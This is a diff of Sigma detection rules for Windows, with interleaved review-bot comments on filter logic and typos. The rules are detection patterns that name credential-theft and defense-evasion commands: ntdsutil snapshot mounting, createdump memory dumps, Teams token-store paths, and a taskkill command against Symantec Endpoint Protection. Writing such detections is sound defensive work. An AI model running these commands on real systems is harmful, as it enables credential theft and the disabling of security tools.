+++ b/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml
@@ -11,7 +11,7 @@ references:
 - https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml
 - https://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp
 date: 2022/07/12
-modified: 2022/07/14
+modified: 2022/09/13
 logsource:
 category: process_creation
 product: windows
@@ -31,6 +31,7 @@ detection:
 - '\Users\Public\'
 - '\WINDOWS\Temp\'
 - '%temp%'
+ - '%tmp%'
 - '%appdata%'
 condition: all of selection_*
 falsepositives:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml b/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml
index d89582a80..e8b55f8fe 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)
 author: Max Altgelt
 date: 2021/12/09
-modified: 2022/06/20
+modified: 2022/09/20
 references:
 - https://pentestlaboratories.com/2021/12/08/process-ghosting/
 tags:
@@ -23,6 +23,7 @@ detection:
 Image:
 - 'Registry'
 - 'MemCompression'
+ - 'vmmem'
 filter_empty:
 Image:
 - '-'
diff --git a/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml b/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml
new file mode 100644
index 000000000..cff53a918
--- /dev/null
+++ b/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml
@@ -0,0 +1,38 @@
+title: Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)
+id: a58353df-af43-4753-bad0-cd83ef35eef5
+related:
+ - id: 2afafd61-6aae-4df4-baed-139fa1f4c345
+ type: derived
+status: experimental
+description: Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.
+author: Nasreddine Bencherchali
+references:
+ - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11)
+ - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments
+date: 2022/09/14
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection_img:
+ - Image|endswith: '\ntdsutil.exe'
+ - OriginalFileName: 'ntdsutil.exe'
+ selection_cli:
+ - CommandLine|contains|all:
+ - 'snapshot'
+ - 'mount ' # mounts a specific snapshot - Ex: ntdsutil snapshot "mount c2b3e2c6-1ffb-4625-ba8e-3503c27a9fcb" quit quit
+ - CommandLine|contains|all:
+ # This offers more coverage to the "selection_oneliner_1" case in rule 8bc64091-6875-4881-aaf9-7bd25b5dda08
+ # The shorest form of "activate" can "ac". But "act", "acti"...etc are also valid forms
+ # Same case with the "instance" flag
+ - 'ac'
+ - ' i'
+ - ' ntds'
+ condition: all of selection_*
+falsepositives:
+ - Legitimate usage to restore snapshots
+ - Legitimate admin activity
+level: medium
+tags:
+ - attack.credential_access
+ - attack.t1003.003
diff --git a/rules/windows/process_creation/proc_creation_win_susp_powershell_cmd_patterns.yml b/rules/windows/process_creation/proc_creation_win_susp_powershell_cmd_patterns.yml
index 115d72cea..d1a4a1c0e 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_powershell_cmd_patterns.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_powershell_cmd_patterns.yml
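Review bot: In the second `CommandLine|contains|all` branch the token `'ac'` is satisfied by almost any ntdsutil command line (it is a substring of `backup`, `activate` and of many paths), so in practice the branch reduces to `' i'` plus `' ntds'`, which the comment about abbreviated `activate` forms does not convey; either state that openly or, if the observed invocations allow it, use a delimited token such as `' ac'` or `'"ac'`. The comments also carry typos — `# The shortest form of "activate" is "ac", but "act", "acti", ... are also valid forms` reads better than the current line. The trailing space inside `'mount '` is load-bearing and easy to lose in a later edit; a `# note the trailing space` remark protects it.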
@@ -6,7 +6,7 @@ author: Florian Roth
 references:
 - https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/
 date: 2022/05/24
-modified: 2022/07/14
+modified: 2022/09/26
 tags:
 - attack.execution
 - attack.t1059.001
@@ -32,7 +32,11 @@ detection:
 - ' IAB'
 - ' PAA'
 - ' aQBlAHgA'
- condition: encoded and selection
+ filter:
+ ParentImage|contains:
+ - 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\'
+ - '\gc_worker.exe'
+ condition: encoded and selection and not filter
 falsepositives:
 - Other tools that work with encoded scripts in the command line instead of script files
 level: high
diff --git a/rules/windows/process_creation/proc_creation_win_susp_powershell_encode.yml b/rules/windows/process_creation/proc_creation_win_susp_powershell_encode.yml
index f6ab8837d..42a2a1995 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_powershell_encode.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_powershell_encode.yml
@@ -8,7 +8,7 @@ references:
 - https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/
 - https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/
 date: 2022/01/02
-modified: 2022/07/14
+modified: 2022/09/26
 logsource:
 category: process_creation
 product: windows
@@ -25,7 +25,11 @@ detection:
 - ' -ec '
 filter:
 CommandLine|contains: ' -Encoding '
- condition: selection and not filter
+ filter_azure:
+ ParentImage|contains:
+ - 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\'
+ - '\gc_worker.exe'
+ condition: selection and not 1 of filter*
 falsepositives:
 - Unknown
 level: medium
diff --git a/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml b/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml
index a61e012a5..14a3ff9bf 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml
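Review bot: The new `filter` in proc_creation_win_susp_powershell_cmd_patterns.yml uses `ParentImage|contains` with a two-entry list, and list values are OR-ed, so a parent named `gc_worker.exe` in any directory — not only under the Azure Guest Configuration plugin path — exempts encoded PowerShell from this high-level rule; the two strings should be AND-ed and anchored as two keys of one map: `ParentImage|startswith: 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\'` and `ParentImage|endswith: '\gc_worker.exe'`. The `filter_azure` added to proc_creation_win_susp_powershell_encode.yml in the next hunk has exactly the same shape and needs the same change. Naming the filter `filter_azure_guestconfig` in both rules, as the second already half-does, would also record what is being exempted.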
+++ b/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)
 references:
 - https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
-author: FLorian Roth
+author: Florian Roth
 date: 2022/07/21
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_susp_recon.yml b/rules/windows/process_creation/proc_creation_win_susp_recon.yml
index 7af331728..5e97ea32b 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_recon.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_recon.yml
@@ -3,6 +3,7 @@ id: aa2efee7-34dd-446e-8a37-40790a66efd7
 status: experimental
 author: frack113
 date: 2021/07/30
+modified: 2022/09/13
 description: Once established within a system or network, an adversary may use automated techniques for collecting internal data.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md
@@ -24,7 +25,9 @@ detection:
 - 'DOSKEY.EXE'
 - 'sc.exe'
 selection_redirect:
- ParentCommandLine|contains: ' > %TEMP%\'
+ ParentCommandLine|contains:
+ - ' > %TEMP%\'
+ - ' > %TMP%\'
 condition: all of selection*
 falsepositives:
 - Unknown
diff --git a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml
index c86ba586d..3bd4048a7 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects various anomalies in relation to regsvr32.exe
 author: Florian Roth, oscd.community, Tim Shelton
 date: 2019/01/16
-modified: 2022/07/20
+modified: 2022/09/21
 references:
 - https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html
 - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/
@@ -73,6 +73,8 @@ detection:
 filter2:
 ParentImage: 'C:\Program Files\Box\Box\FS\streem.exe'
 CommandLine|contains: '\Program Files\Box\Box\Temp\'
+ filter_legitimate:
+ CommandLine|endswith: '/s C:\Windows\System32\RpcProxy\RpcProxy.dll'
 condition: 1 of selection* and not 1 of filter*
 fields:
 - CommandLine
diff --git a/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml b/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml
new file mode 100644
index 000000000..32145a719
--- /dev/null
+++ b/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml
@@ -0,0 +1,30 @@
+title: Renamed CreateDump Process Dump
+id: 1a1ed54a-2ba4-4221-94d5-01dee560d71e
+description: Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory
+status: experimental
+references:
+ - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/
+ - https://twitter.com/bopin2020/status/1366400799199272960
+author: Florian Roth
+date: 2022/09/20
+tags:
+ - attack.defense_evasion
+ - attack.t1036
+ - attack.t1003.001
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ OriginalFileName: 'FX_VER_INTERNALNAME_STR'
+ selection_cli:
+ CommandLine|contains|all:
+ - ' -u ' # Short version of '--full'
+ - ' -f ' # Short version of '--name'
+ - '.dmp'
+ filter:
+ Image|endswith: '\createdump.exe'
+ condition: 1 of selection* and not filter
+falsepositives:
+ - Command lines that use the same flags
+level: high
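Review bot: `filter_legitimate` in the regsvr32 hunk keys only on `CommandLine|endswith` and carries no comment, so nobody can later tell which of the rule's anomaly selections it was meant to quiet or which process legitimately registers RpcProxy.dll; give it a name that says what it is and record the observation, e.g. `filter_rpcproxy:` with `# RPC-over-HTTP proxy DLL registration seen during <role/installer setup> — TODO confirm parent`, and add the observed `ParentImage` to the same map so the exemption is bound to that parent rather than to the argument string alone, as `filter2` above it already does with `streem.exe`. The enclosing `detection` block starts outside the hunk.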
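Review bot: In the new createdump rule, `condition: 1 of selection* and not filter` lets `selection_cli` fire on its own, so any binary not named createdump.exe whose command line contains ` -u `, ` -f ` and `.dmp` is reported as a renamed createdump; the `falsepositives` entry admits this but the title and `description` do not, so either require both branches (`condition: all of selection* and not filter`) or say in the description that the flag pattern alone is treated as sufficient. `OriginalFileName: 'FX_VER_INTERNALNAME_STR'` looks like the unfilled version-resource placeholder of the .NET runtime's native build rather than a name unique to createdump — worth confirming whether other runtime binaries ship with the same placeholder, and worth a comment either way: `# createdump.exe ships with the build-time placeholder instead of its real internal name`. The `-u`/`-f` comments should also say the long forms are createdump's own, since `# Short version of '--full'` alone reads as generic.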
diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml
index 831dc9d60..f2bea0cd7 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml
@@ -10,7 +10,7 @@ tags:
 - attack.t1053.005
 author: Florian Roth
 date: 2022/02/21
-modified: 2022/07/28
+modified: 2022/09/18
 logsource:
 product: windows
 category: process_creation
@@ -36,7 +36,9 @@ detection:
 - 'C:\Windows\Temp'
 - 'C:\Perflogs'
 filter_mixed:
- - CommandLine|contains: 'update_task.xml'
+ - CommandLine|contains:
+ - 'update_task.xml'
+ - '/Create /TN TVInstallRestore /TR'
 - ParentCommandLine|contains: 'unattended.ini'
 condition: ( all of selection1* or all of selection2* ) and not 1 of filter*
 falsepositives:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml b/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml
index e0074c19a..b728cadd7 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml
@@ -1,4 +1,4 @@
-title: Suspicious Execution of SharpView Aka PowerView
+title: Suspicious Execution of SharpView Aka PowerView
 id: b2317cfa-4a47-4ead-b3ff-297438c0bc2d
 status: experimental
 description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
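Review bot: `'/Create /TN TVInstallRestore /TR'` exempts on a task name alone, and the task name is chosen by whoever runs schtasks, so nothing in the event ties the exemption to the product it is meant for; as with `'update_task.xml'` beside it, adding the observed `ParentImage` (presumably the TeamViewer setup binary, given the `TV` prefix) or a `CommandLine|contains` on the `/TR` target path in the same map would make it specific. At minimum a comment naming the product, e.g. `# TeamViewer installer registers the TVInstallRestore task — TODO confirm parent`, keeps the string from being mistaken for tradecraft later.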
@@ -8,20 +8,21 @@ references:
- https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview
date: 2021/12/10
+modified: 2022/09/27
logsource:
category: process_creation
product: windows
detection:
- sharpview:
- OriginalFileName: SharpView.exe
- sharpview_methods:
- Commandline|contains:
+ selection:
+ - OriginalFileName: SharpView.exe
+ - Image|endswith: '\SharpView.exe'
+ - CommandLine|contains:
- Get-DomainGPOUserLocalGroupMapping
- Find-GPOLocation
- Get-DomainGPOComputerLocalGroupMapping
- Find-GPOComputerAdmin
- Get-DomainObjectAcl
- - Get-ObjectAcl
+ #- Get-ObjectAcl
- Add-DomainObjectAcl
- Add-ObjectAcl
- Remove-DomainObjectAcl
@@ -33,7 +34,7 @@ detection:
- Get-WMIProcess
- Get-NetProcess
- Get-WMIRegProxy
- - Get-Proxy
+ #- Get-Proxy
- Get-WMIRegLastLoggedOn
- Get-LastLoggedOn
- Get-WMIRegCachedRDPConnection
@@ -65,8 +66,8 @@ detection:
- Find-InterestingFile
- Find-InterestingDomainShareFile
- Find-DomainObjectPropertyOutlier
- - TestMethod
- - Get-Domain
+ #- TestMethod
+ #- Get-Domain
- Get-NetDomain
- Get-DomainComputer
- Get-NetComputer
@@ -80,13 +81,13 @@ detection:
- Get-DomainUser
- Get-NetUser
- Get-DomainGroup
- - Get-NetGroup
+ #- Get-NetGroup
- Get-DomainDFSShare
- Get-DFSshare
- Get-DomainDNSRecord
- - Get-DNSRecord
- - Get-DomainDNSZone
- - Get-DNSZone
+ #- Get-DNSRecord
+ #- Get-DomainDNSZone
+ #- Get-DNSZone
- Get-DomainForeignGroupMember
- Find-ForeignGroup
- Get-DomainForeignUser
@@ -100,7 +101,7 @@ detection:
- Get-DomainOU
- Get-NetOU
- Get-DomainSID
- - Get-Forest
+ #- Get-Forest
- Get-NetForest
- Get-ForestTrust
- Get-NetForestTrust
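Review bot: The entries turned into `#- …` comments in this and the following hunks (`Get-ObjectAcl`, `Get-Proxy`, `TestMethod`, `Get-Domain`, `Get-NetGroup`, `Get-DNSRecord`, `Get-DomainDNSZone`, `Get-DNSZone`, `Get-Forest`, and more in the next hunk) carry no explanation, so a future contributor cannot tell whether they were dropped for false positives or by accident and may simply re-enable them. One comment above the `CommandLine|contains` list, e.g. `# Commented-out names are generic enough to appear in unrelated tooling; do not re-add without a filter`, would preserve the reasoning — assuming FP reduction is indeed the motive, which the hunk does not state. The renamed `selection` with three alternatives is a list of maps, i.e. an OR, which matches the old `sharpview or sharpview_methods` semantics; the list continues past the end of this hunk.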
@@ -117,32 +118,33 @@ detection:
- Get-ForestGlobalCatalog
- Get-NetForestCatalog
- Get-DomainUserEvent
- - Get-UserEvent
+ #- Get-UserEvent
- Get-DomainGUIDMap
- - Get-GUIDMap
+ #- Get-GUIDMap
- Resolve-IPAddress
- - Get-IPAddress
+ #- Get-IPAddress
- ConvertTo-SID
- Invoke-UserImpersonation
- - Invoke-RevertToSelf
+ #- Invoke-RevertToSelf
- Get-DomainSPNTicket
- Request-SPNTicket
- Get-NetComputerSiteName
- - Get-SiteName
+ #- Get-SiteName
- Get-DomainGPO
- Get-NetGPO
- Set-DomainObject
- - Set-ADObject
+ #- Set-ADObject
- Add-RemoteConnection
- Remove-RemoteConnection
- - Get-IniContent
+ #- Get-IniContent
- Get-GptTmpl
- Get-GroupsXML
- Get-DomainPolicyData
- Get-DomainPolicy
- Get-DomainGPOLocalGroup
- Get-NetGPOGroup
- condition: sharpview or sharpview_methods
+ - Invoke-Sharefinder
+ condition: selection
falsepositives:
- Unknown
level: high
diff --git a/rules/windows/process_creation/proc_creation_win_susp_squirrel_lolbin.yml b/rules/windows/process_creation/proc_creation_win_susp_squirrel_lolbin.yml
index 7912a646f..911c0d961 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_squirrel_lolbin.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_squirrel_lolbin.yml
@@ -11,7 +11,7 @@ tags:
- attack.t1218
author: Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community
date: 2019/11/12
-modified: 2022/08/23
+modified: 2022/09/20
logsource:
category: process_creation
product: windows
@@ -32,6 +32,9 @@ detection:
- CommandLine|contains|all:
- 'C:\Users\'
- '\AppData\Local\GitHubDesktop\Update.exe --createShortcut GitHubDesktop.exe'
+ - CommandLine|contains|all:
+ - 'C:\Users\'
+ - '\AppData\Local\GitHubDesktop\Update.exe --processStartAndWait GitHubDesktop.exe'
- CommandLine|contains|all:
- 'C:\Users\'
- '\AppData\Local\Microsoft\Teams\Update.exe" --processStart "Teams.exe"'
diff --git a/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml b/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml
index 55a1e537c..a25e7f125 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml
@@ -7,7 +7,7 @@ references:
- https://tools.thehacker.recipes/mimikatz/modules
author: Florian Roth (rule), David ANDRE (additional keywords)
date: 2021/12/20
-modified: 2022/04/27
+modified: 2022/09/27
logsource:
category: process_creation
product: windows
@@ -71,6 +71,8 @@ detection:
filter_vs:
Image|endswith: '\PING.EXE'
ParentCommandLine|contains: '\DismFoDInstall.cmd'
+ filter_config_mgr:
+ ParentImage|startswith: 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\'
condition: all of selection* and not 1 of filter*
falsepositives:
- Administrative activity
diff --git a/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml b/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml
index a7895ad42..95a4a857c 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml
@@ -10,6 +10,7 @@ tags:
- attack.t1218.011
author: Christian Burkard
date: 2021/11/24
+modified: 2022/09/13
logsource:
category: process_creation
product: windows
@@ -23,6 +24,7 @@ detection:
- '%AppData%'
- '%LocalAppData%'
- '%Temp%'
+ - '%tmp%'
- '\AppData\'
- '\Temp\'
- '\Users\Public\'
diff --git a/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml b/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml
index b286838b9..589daabf4 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml
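Review bot: `filter_config_mgr` keys only on a `ParentImage|startswith` prefix under `C:\Packages\Plugins\…`, so every child of anything launched from that extension directory is excluded from a level-high SYSTEM-user anomaly rule, whatever the child image or command line; the neighbouring `filter_vs` pairs its `ParentCommandLine` with an `Image|endswith` for exactly this reason. Add the `Image` (or `CommandLine|contains`) that the false positive actually showed, and a comment naming the source, e.g. `# Azure Guest Configuration extension spawning its helper processes (presumed — record the observed child)`. The selections this filter applies to are outside the hunk.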
@@ -6,7 +6,7 @@ references:
- https://twitter.com/SBousseaden/status/1139811587760562176
author: Florian Roth (rule), Samir Bousseaden (idea)
date: 2019/06/17
-modified: 2021/06/29
+modified: 2021/09/28
logsource:
category: process_creation
product: windows
@@ -18,7 +18,7 @@ detection:
filter2:
- Image|endswith: '\explorer.exe'
- ImageFileName: 'explorer.exe'
- condition: selection and not filter1 and not filter2
+ condition: selection and not 1 of filter*
fields:
- CommandLine
- ParentCommandLine
diff --git a/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml b/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml
index 999d77e14..7eba3a23c 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml
@@ -7,7 +7,7 @@ references:
- https://thedfirreport.com/2020/10/08/ryuks-return/
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker
date: 2020/10/12
-modified: 2022/08/24
+modified: 2022/09/13
logsource:
category: process_creation
product: windows
@@ -34,6 +34,7 @@ detection:
- '\Windows\Temp\'
- '\AppData\Local\'
- '%temp%'
+ - '%tmp%'
- '%ProgramData%'
- '%appdata%'
- '%comspec%'
diff --git a/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml b/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml
index e9ec591cf..14d2cd03e 100644
--- a/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml
+++ b/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml
@@ -6,7 +6,7 @@ references:
- https://twitter.com/GelosSnake/status/934900723426439170
author: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali
date: 2017/11/27
-modified: 2022/09/07
+modified: 2022/09/20
tags:
- attack.defense_evasion
- attack.t1036
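Review bot: `modified: 2021/09/28` in the userinit rule moves the date backwards relative to the rest of this commit: the previous value was 2021/06/29 and every other rule touched here is bumped to 2022/09/xx, so this is almost certainly meant to be `modified: 2022/09/28`. The condition rewrite in the next hunk (`selection and not 1 of filter*`) covers the same two filters as before, so nothing else in the file needs to follow.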
@@ -71,7 +71,9 @@ detection:
- 'C:\Windows\WinSxS\'
# - 'C:\avast! sandbox'
- Image|contains: '\SystemRoot\System32\'
- - Image: 'C:\Windows\explorer.exe'
+ - Image:
+ - 'C:\Windows\explorer.exe'
+ - 'C:\Program Files\PowerShell\7\pwsh.exe'
condition: selection and not filter
fields:
- ComputerName
diff --git a/rules/windows/process_creation/proc_creation_win_taskkill_sep.yml b/rules/windows/process_creation/proc_creation_win_taskkill_sep.yml
new file mode 100644
index 000000000..92f6ddbbe
--- /dev/null
+++ b/rules/windows/process_creation/proc_creation_win_taskkill_sep.yml
@@ -0,0 +1,27 @@
+title: Taskkill Symantec Endpoint Protection
+id: 4a6713f6-3331-11ed-a261-0242ac120002
+status: experimental
+description: Detects one of the possible scenarios for disabling symantec endpoint protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.
+references:
+ - https://www.exploit-db.com/exploits/37525
+ - https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection
+ - https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer
+author: Ilya Krestinichev, Florian Roth
+date: 2022/09/13
+tags:
+ - attack.defense_evasion
+ - attack.t1562.001
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ CommandLine|contains|all:
+ - 'taskkill'
+ - ' /F '
+ - ' /IM '
+ - 'ccSvcHst.exe'
+ condition: selection
+falsepositives:
+ - Unknown
+level: high
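Review bot: `' /F '` requires a trailing space, so a command line in which the force flag is the final token (the flags of taskkill are order-independent, and the description itself writes `ccSvcHst.exe /f`) is missed by `contains|all`; `' /IM '` has the same edge when the image name is the last argument, though that is rarer. Splitting the force flag into its own selection with both spellings, `selection_force:` / `- CommandLine|contains: ' /F '` / `- CommandLine|endswith: ' /F'`, and switching to `condition: all of selection*` closes the gap without widening to `/FI`. The description sentence `can execute the taskkill /im command several times ccSvcHst.exe /f` is garbled; `can run taskkill /f /im ccSvcHst.exe repeatedly` says the same thing.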
diff --git a/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml b/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml
new file mode 100644
index 000000000..7d72377f8
--- /dev/null
+++ b/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml
@@ -0,0 +1,27 @@
+title: Suspicious Command With Teams Objects Pathes
+id: d2eb17db-1d39-41dc-b57f-301f6512fa75
+status: experimental
+description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.
+author: '@SerkinValery'
+references:
+ - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/
+ - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens
+date: 2022/09/16
+modified: 2022/09/27
+logsource:
+ product: windows
+ category: process_creation
+detection:
+ selection:
+ CommandLine|contains:
+ - '\Microsoft\Teams\Cookies'
+ - '\Microsoft\Teams\Local Storage\leveldb'
+ filter:
+ Image|endswith: '\Microsoft\Teams\current\Teams.exe'
+ condition: selection and not filter
+falsepositives:
+ - Unknown
+level: high
+tags:
+ - attack.credential_access
+ - attack.t1528
diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml
index db964e3ad..e6e47c5e1 100644
--- a/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml
+++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml
@@ -3,6 +3,7 @@ id: 49f2f17b-b4c8-4172-a68b-d5bf95d05130
description: Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface
author: Florian Roth
date: 2022/09/13
+modified: 2022/09/27
status: experimental
references:
- https://www.elastic.co/guide/en/security/current/uac-bypass-via-icmluautil-elevated-com-interface.html
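Review bot: `Pathes` in the title is a misspelling — `title: Suspicious Command With Teams Objects Paths`. The `filter` excludes by `Image|endswith: '\Microsoft\Teams\current\Teams.exe'` without saying why; a comment such as `# Teams itself references its own token stores on the command line` records the reason, and since the per-user client lives under the profile directory, adding `Image|startswith: 'C:\Users\'` (if that matches the installs you have observed) pins the exclusion to the real install location rather than any path ending in that suffix.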
@@ -15,8 +16,8 @@ logsource:
product: windows
detection:
selection:
- Image|endswith: '\dllhost.exe'
- ParentCommandLine:
+ ParentImage|endswith: '\dllhost.exe'
+ ParentCommandLine|contains:
- '/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}'
- '/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}'
filter:
diff --git a/rules/windows/process_creation/proc_creation_win_ultraviewer.yml b/rules/windows/process_creation/proc_creation_win_ultraviewer.yml
new file mode 100644
index 000000000..f3781c979
--- /dev/null
+++ b/rules/windows/process_creation/proc_creation_win_ultraviewer.yml
@@ -0,0 +1,26 @@
+title: Use of UltraViewer Remote Access Software
+id: 88656cec-6c3b-487c-82c0-f73ebb805503
+status: experimental
+description: |
+ An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+ These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+ Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md
+author: frack113
+date: 2022/09/25
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ - Product: UltraViewer
+ - Company: DucFabulous Co,ltd
+ - OriginalFileName: UltraViewer_Desktop.exe
+ condition: selection
+falsepositives:
+ - Legitimate use
+level: medium
+tags:
+ - attack.command_and_control
+ - attack.t1219
diff --git a/rules/windows/process_creation/proc_creation_win_w32tm.yml b/rules/windows/process_creation/proc_creation_win_w32tm.yml
new file mode 100644
index 000000000..f3881508c
--- /dev/null
+++ b/rules/windows/process_creation/proc_creation_win_w32tm.yml
@@ -0,0 +1,30 @@
+title: Use of W32tm as Timer
+id: 6da2c9f5-7c53-401b-aacb-92c040ce1215
+status: experimental
+description: When configured with suitable command line arguments, w32tm can act as a delay mechanism
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md
+ - https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains
+author: frack113
+date: 2022/09/25
+logsource:
+ category: process_creation
+ product: windows
+detection:
